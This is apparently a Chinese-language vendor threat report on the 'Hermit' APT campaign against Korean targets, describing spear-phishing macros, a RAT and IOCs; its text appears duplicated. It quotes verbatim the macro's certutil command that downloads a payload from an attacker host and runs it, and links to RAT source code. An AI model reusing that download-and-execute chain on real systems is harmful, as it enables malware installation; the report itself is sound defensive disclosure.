Hermit(隐士):针对朝鲜半岛的APT攻击活动披露
Contents
Hermit(隐士):针对朝鲜半岛的APT攻击活动披露
2018-12-20 02:45:59
一、概述
前段时间,腾讯御见威胁情报中心曝光了SYSCON/SANNY木马的活动情况,并且根据关联分析确定跟KONNI为同一组织所为,并且疑似跟Darkhotel也有一定的关联。SYSCON木马是一个非常有特色的远程控制木马,通过ftp协议来进行C&C控制,该后门专门的主要攻击目标为朝鲜半岛相关的重要政治人物或者要害部门,偶尔也会针对东南亚等国进行攻击。该活动自2017年下半年开始活跃,并且对多个目标进行了攻击活动。
近期,腾讯御见威胁情报中心捕获了一个加载执行过程和下载地址与SYSCON木马相似度极高的样本,但经过分析,最终的payload已不再是SYSCON,而是一款名为byface的木马变种,木马同时使用了无界面的Teamview进行远程控制。经过溯源分析,发现该攻击活动可追溯至2018年4月份,活动时间超过了半年。
攻击流程图:
由于分析过程中我们发现攻击者疑似或者伪装成某教会成员,而攻击对象为朝鲜半岛的相关目标。由于该攻击活动的诱饵文档内容往往被隐藏,而只有启动宏后才能完全被显示,因此取名为hermit(隐士)。
二、技术分析
1、 攻击方式
攻击方式依然为最常用的鱼叉钓鱼方式,通过发送带有恶意文档的邮件针对相应的目标进行攻击。执行恶意文档后,需要用户执行宏后,触发恶意的行为:
宏的功能是使用cmd.exe执行以下命令,copy /Y %windir%\System32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f http://filer2.1apps.com/1.txt && cd /d %TEMP% && ct -decode -f 1.txt 1.bat && del /f /q 1.txt && 1.bat
2、 木马安装过程分析
上面的url的内容,是存储着假冒的PEM编码的SSL证书,然后使用certutil.exe来解码其中的base64代码(去除BEGIN和END标记)
解码后的1.bat如下:
bat的主要功能是主要根据系统类型下载cab文件到本地展开执行,其过程及代码与我们上次披露的 SYSCON木马完全一致(下载地址除外),下载域名的后两段也一样均为1apps.com。
下载的setup.cab分为x86和x64两个版本,根据被攻击者的操作系统版本来决定。解包后的cab有4个文件:
其中:
winnet.ini:为存放加密后的C2地址;
install.bat:加注册表启动项;
udpconn.dll:为绕UAC的模块;
BrowserUpdate.exe:为核心的后门文件。
其中udpconn.dll中过UAC相关代码如下:
3、 核心木马BrowserUpdate.exe分析
1) 恶意代码以加密shellcode的形式存放在全局变量中,解密后使用EnumWindows来执行恶意shellcode:
2) shellcode行为:恶意shellcode的功能是解密.zokar区段,解密后得到一个没有MZ标志的PE文件,完成后在头部加上MZ,随后使用内存load技术在内存展开执行该文件:
3) 核心payload行为:读取当前目录下的winnet.ini文件,解密出C2地址:
解密前后的C2:
4) RAT功能:成功解密出C2后连接C2,成功后进行命令分发,能够实现列举目录、上传,下载,执行文件、列举及结束进程等操作。
核心命令分发代码:
具体命令:
4、 第二阶段木马iiexplorer.exe分析:
该阶段木马iiexplorer.exe为第一阶段木马下发:
下载文件到指定路径:
实际上该木马iiexplorer.exe为一个隐藏界面的teamviewer改装版。执行后iiexplorer.exe会将控制ID生成到同目录的set.log文件中,随后操作者使用上传文件指令将set.log上传到C2并删除了该文件,最后使用teamviewer通过ID控制被感染的设备。
执行下载后的文件:
运行后上传同目录下的set.log:
set.log内容,为teamviewer控制id:
窗口信息:
强制显示窗口后为韩文版teamviewer:
三、关联分析
1、 和SYSCON及KONNI的关系
该木马的安装过程及代码与我们上次披露的 SYSCON木马完全一致(下载地址除外),下载域名的后两段也一样均为1apps.com:
而之前腾讯御见威胁情报中心的文章中已经详细分析了SYSCON跟KONNI的关系,本文不再赘述。因此我们确定该活动、SYSCON、KONNI的攻击组织是同一个。
2、 核心木马溯源
在分析过程中,我们发现该木马会发送内容fxftest的数据包作为通讯上线验证数据包,而且该字符被硬编码在解密出RAT文件中。如上线数据包:
经搜索发现该木马的多个字符串均被标记为APT1:
mandiant的分析与本次木马高度相似:
然而SYSCON和APT1 肯定是没有关系的,而为什么会出现这种情况呢?我们又找到了mandiant关于APT1的报告,发现所用的RAT确实高度相似。排除掉SYSCON和APT1的关联可能性后,就只有一个可能,这是一个公开的RAT或者开源的RAT。
经过我们详细查找,终于找到了该木马的源码:下载地址为http://www.pudn.com/Download/item/id/215589.html,从源码工程看,该木马名为Babyface,该木马源码注释,提示信息均为中文。
Babyface木马源码早于2006年9月22日就被上传到网上,因此我们有理由相信APT1和darkhotel两个组织所用的该木马均源于此本源代码。此外经过对比源代码和木马反编译代码我们发现:本次木马修改把所有提示信息全部翻译成了英文!
源码与反编译代码比较:
3、 攻击活动背景分析
腾讯御见威胁情报中心之前的关于SYSCON的报告中也分析过该组织的相关背景:为使用朝鲜语的人群,但是对于本次攻击活动,我们通过对攻击样本的关联,又找到了类似的攻击样本,使得我们对该攻击组织有了更多的分析素材。
如攻击样本同样使用钓鱼邮件进行攻击:
如相关的文件名:
요청주신 정책 관련 자료 .doc
확인 자료 .doc等
下面为相关分析:
1) 攻击的对象分析
从上面的攻击诱饵的文件名可以推测攻击对象为使用朝鲜语国家。
文档内容信息:
被攻击者邮件:[email protected],其中naver.com为韩国最大的门户网站。
邮件内容里带韩文:
2) 攻击者分析:
攻击者使用的邮箱为:김관운 [email protected]
对该邮箱使用搜索引擎进行简单的搜索,结果如下:
Youtube信息:
Twiter信息:
Google+
Afreecatv:
从搜索结果来看,该人士为从事宗教相关的工作,当然也不排除攻击者伪装成该人士进行恶意邮件的分发。
从上述信息来看,攻击者使用朝鲜语的证据是充足的,其具体意图尚待进一步的分析。我们希望安全社区的同仁一起来完善攻击者背景。
四、总结
该次攻击活动为持续半年以上的攻击活动,攻击者为了伪装身份和逃避查杀,使用10多年前开源的木马加以修改,以及使用商业远程控制工具Teamview,这加大了查杀和溯源的难度。此外,虽然目前该活动是针对朝鲜半岛的攻击活动,但是也不排除会进入中国境内,因此切不可掉以轻心。腾讯御见威胁情报中心会持续对该攻击活动进行跟踪。
五、安全建议
建议企业用户参考以下几点加强防范:
1. 不要打开不明来源的邮件附件;
2. 及时打系统补丁和重要软件的补丁;
3. 打开Office文档时,除非明确清楚文档来源可靠,请勿启用宏功能;
4. 使用杀毒软件防御可能的病毒木马攻击;
5. 使用腾讯御界高级威胁检测系统。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
六、附录(IOCs)
Hash:
2bfbf8ce47585aa86b1ab90ff109fd57
0eb6090397c74327cd4d47819f724953
0eb6090397c74327cd4d47819f724953
ff8f9a20c00d9d41836bfa4fac3244a9
c9f0125b449dd44d112644901d787e3f
fcceef71738e1506c4524e3210f4b23d
25dd8c4965b09df082968ad4f92ffe5f
7090eb434f228705acd8d2da5e7c7899
1dcaf6c62c65b4594a27259bd8bc31ea
38b3045a69ff6339adec25822d4d8e25
282f3f17d7d6dc68e220fe328adc66c5
7f7b32771da9760a9e233807196f086d
25dd8c4965b09df082968ad4f92ffe5f
7090eb434f228705acd8d2da5e7c7899
a25811b24b7f27a486c05c0a09ad992d
C2:
103.249.31.159:7777
参考链接:
https://mp.weixin.qq.com/s/rh4DoswLUNkS8uiHjrFU9A
https://mp.weixin.qq.com/s/F2-DLtuHUkV_nCnKwp44_Q
在线客服
方案咨询
合作伙伴
2018-12-20 02:45:59
一、概述
前段时间,腾讯御见威胁情报中心曝光了SYSCON/SANNY木马的活动情况,并且根据关联分析确定跟KONNI为同一组织所为,并且疑似跟Darkhotel也有一定的关联。SYSCON木马是一个非常有特色的远程控制木马,通过ftp协议来进行C&C控制,该后门专门的主要攻击目标为朝鲜半岛相关的重要政治人物或者要害部门,偶尔也会针对东南亚等国进行攻击。该活动自2017年下半年开始活跃,并且对多个目标进行了攻击活动。
近期,腾讯御见威胁情报中心捕获了一个加载执行过程和下载地址与SYSCON木马相似度极高的样本,但经过分析,最终的payload已不再是SYSCON,而是一款名为byface的木马变种,木马同时使用了无界面的Teamview进行远程控制。经过溯源分析,发现该攻击活动可追溯至2018年4月份,活动时间超过了半年。
攻击流程图:
由于分析过程中我们发现攻击者疑似或者伪装成某教会成员,而攻击对象为朝鲜半岛的相关目标。由于该攻击活动的诱饵文档内容往往被隐藏,而只有启动宏后才能完全被显示,因此取名为hermit(隐士)。
二、技术分析
1、 攻击方式
攻击方式依然为最常用的鱼叉钓鱼方式,通过发送带有恶意文档的邮件针对相应的目标进行攻击。执行恶意文档后,需要用户执行宏后,触发恶意的行为:
宏的功能是使用cmd.exe执行以下命令,copy /Y %windir%\System32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f http://filer2.1apps.com/1.txt && cd /d %TEMP% && ct -decode -f 1.txt 1.bat && del /f /q 1.txt && 1.bat
2、 木马安装过程分析
上面的url的内容,是存储着假冒的PEM编码的SSL证书,然后使用certutil.exe来解码其中的base64代码(去除BEGIN和END标记)
解码后的1.bat如下:
bat的主要功能是主要根据系统类型下载cab文件到本地展开执行,其过程及代码与我们上次披露的 SYSCON木马完全一致(下载地址除外),下载域名的后两段也一样均为1apps.com。
下载的setup.cab分为x86和x64两个版本,根据被攻击者的操作系统版本来决定。解包后的cab有4个文件:
其中:
winnet.ini:为存放加密后的C2地址;
install.bat:加注册表启动项;
udpconn.dll:为绕UAC的模块;
BrowserUpdate.exe:为核心的后门文件。
其中udpconn.dll中过UAC相关代码如下:
3、 核心木马BrowserUpdate.exe分析
1) 恶意代码以加密shellcode的形式存放在全局变量中,解密后使用EnumWindows来执行恶意shellcode:
2) shellcode行为:恶意shellcode的功能是解密.zokar区段,解密后得到一个没有MZ标志的PE文件,完成后在头部加上MZ,随后使用内存load技术在内存展开执行该文件:
3) 核心payload行为:读取当前目录下的winnet.ini文件,解密出C2地址:
解密前后的C2:
4) RAT功能:成功解密出C2后连接C2,成功后进行命令分发,能够实现列举目录、上传,下载,执行文件、列举及结束进程等操作。
核心命令分发代码:
具体命令:
4、 第二阶段木马iiexplorer.exe分析:
该阶段木马iiexplorer.exe为第一阶段木马下发:
下载文件到指定路径:
实际上该木马iiexplorer.exe为一个隐藏界面的teamviewer改装版。执行后iiexplorer.exe会将控制ID生成到同目录的set.log文件中,随后操作者使用上传文件指令将set.log上传到C2并删除了该文件,最后使用teamviewer通过ID控制被感染的设备。
执行下载后的文件:
运行后上传同目录下的set.log:
set.log内容,为teamviewer控制id:
窗口信息:
强制显示窗口后为韩文版teamviewer:
三、关联分析
1、 和SYSCON及KONNI的关系
该木马的安装过程及代码与我们上次披露的 SYSCON木马完全一致(下载地址除外),下载域名的后两段也一样均为1apps.com:
而之前腾讯御见威胁情报中心的文章中已经详细分析了SYSCON跟KONNI的关系,本文不再赘述。因此我们确定该活动、SYSCON、KONNI的攻击组织是同一个。
2、 核心木马溯源
在分析过程中,我们发现该木马会发送内容fxftest的数据包作为通讯上线验证数据包,而且该字符被硬编码在解密出RAT文件中。如上线数据包:
经搜索发现该木马的多个字符串均被标记为APT1:
mandiant的分析与本次木马高度相似:
然而SYSCON和APT1 肯定是没有关系的,而为什么会出现这种情况呢?我们又找到了mandiant关于APT1的报告,发现所用的RAT确实高度相似。排除掉SYSCON和APT1的关联可能性后,就只有一个可能,这是一个公开的RAT或者开源的RAT。
经过我们详细查找,终于找到了该木马的源码:下载地址为http://www.pudn.com/Download/item/id/215589.html,从源码工程看,该木马名为Babyface,该木马源码注释,提示信息均为中文。
Babyface木马源码早于2006年9月22日就被上传到网上,因此我们有理由相信APT1和darkhotel两个组织所用的该木马均源于此本源代码。此外经过对比源代码和木马反编译代码我们发现:本次木马修改把所有提示信息全部翻译成了英文!
源码与反编译代码比较:
3、 攻击活动背景分析
腾讯御见威胁情报中心之前的关于SYSCON的报告中也分析过该组织的相关背景:为使用朝鲜语的人群,但是对于本次攻击活动,我们通过对攻击样本的关联,又找到了类似的攻击样本,使得我们对该攻击组织有了更多的分析素材。
如攻击样本同样使用钓鱼邮件进行攻击:
如相关的文件名:
요청주신 정책 관련 자료 .doc
확인 자료 .doc等
下面为相关分析:
1) 攻击的对象分析
从上面的攻击诱饵的文件名可以推测攻击对象为使用朝鲜语国家。
文档内容信息:
被攻击者邮件:[email protected],其中naver.com为韩国最大的门户网站。
邮件内容里带韩文:
2) 攻击者分析:
攻击者使用的邮箱为:김관운 [email protected]
对该邮箱使用搜索引擎进行简单的搜索,结果如下:
Youtube信息:
Twiter信息:
Google+
Afreecatv:
从搜索结果来看,该人士为从事宗教相关的工作,当然也不排除攻击者伪装成该人士进行恶意邮件的分发。
从上述信息来看,攻击者使用朝鲜语的证据是充足的,其具体意图尚待进一步的分析。我们希望安全社区的同仁一起来完善攻击者背景。
四、总结
该次攻击活动为持续半年以上的攻击活动,攻击者为了伪装身份和逃避查杀,使用10多年前开源的木马加以修改,以及使用商业远程控制工具Teamview,这加大了查杀和溯源的难度。此外,虽然目前该活动是针对朝鲜半岛的攻击活动,但是也不排除会进入中国境内,因此切不可掉以轻心。腾讯御见威胁情报中心会持续对该攻击活动进行跟踪。
五、安全建议
建议企业用户参考以下几点加强防范:
1. 不要打开不明来源的邮件附件;
2. 及时打系统补丁和重要软件的补丁;
3. 打开Office文档时,除非明确清楚文档来源可靠,请勿启用宏功能;
4. 使用杀毒软件防御可能的病毒木马攻击;
5. 使用腾讯御界高级威胁检测系统。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
六、附录(IOCs)
Hash:
2bfbf8ce47585aa86b1ab90ff109fd57
0eb6090397c74327cd4d47819f724953
0eb6090397c74327cd4d47819f724953
ff8f9a20c00d9d41836bfa4fac3244a9
c9f0125b449dd44d112644901d787e3f
fcceef71738e1506c4524e3210f4b23d
25dd8c4965b09df082968ad4f92ffe5f
7090eb434f228705acd8d2da5e7c7899
1dcaf6c62c65b4594a27259bd8bc31ea
38b3045a69ff6339adec25822d4d8e25
282f3f17d7d6dc68e220fe328adc66c5
7f7b32771da9760a9e233807196f086d
25dd8c4965b09df082968ad4f92ffe5f
7090eb434f228705acd8d2da5e7c7899
a25811b24b7f27a486c05c0a09ad992d
C2:
103.249.31.159:7777
参考链接:
https://mp.weixin.qq.com/s/rh4DoswLUNkS8uiHjrFU9A
https://mp.weixin.qq.com/s/F2-DLtuHUkV_nCnKwp44_Q
在线客服
方案咨询
合作伙伴
IoC
0eb6090397c74327cd4d47819f724953
103.249.31.159
1dcaf6c62c65b4594a27259bd8bc31ea
25dd8c4965b09df082968ad4f92ffe5f
282f3f17d7d6dc68e220fe328adc66c5
2bfbf8ce47585aa86b1ab90ff109fd57
38b3045a69ff6339adec25822d4d8e25
7090eb434f228705acd8d2da5e7c7899
7f7b32771da9760a9e233807196f086d
a25811b24b7f27a486c05c0a09ad992d
c9f0125b449dd44d112644901d787e3f
fcceef71738e1506c4524e3210f4b23d
ff8f9a20c00d9d41836bfa4fac3244a9
http://filer2.1apps.com/1.txt
http://www.pudn.com/Download/item/id/215589.html
103.249.31.159
1dcaf6c62c65b4594a27259bd8bc31ea
25dd8c4965b09df082968ad4f92ffe5f
282f3f17d7d6dc68e220fe328adc66c5
2bfbf8ce47585aa86b1ab90ff109fd57
38b3045a69ff6339adec25822d4d8e25
7090eb434f228705acd8d2da5e7c7899
7f7b32771da9760a9e233807196f086d
a25811b24b7f27a486c05c0a09ad992d
c9f0125b449dd44d112644901d787e3f
fcceef71738e1506c4524e3210f4b23d
ff8f9a20c00d9d41836bfa4fac3244a9
http://filer2.1apps.com/1.txt
http://www.pudn.com/Download/item/id/215589.html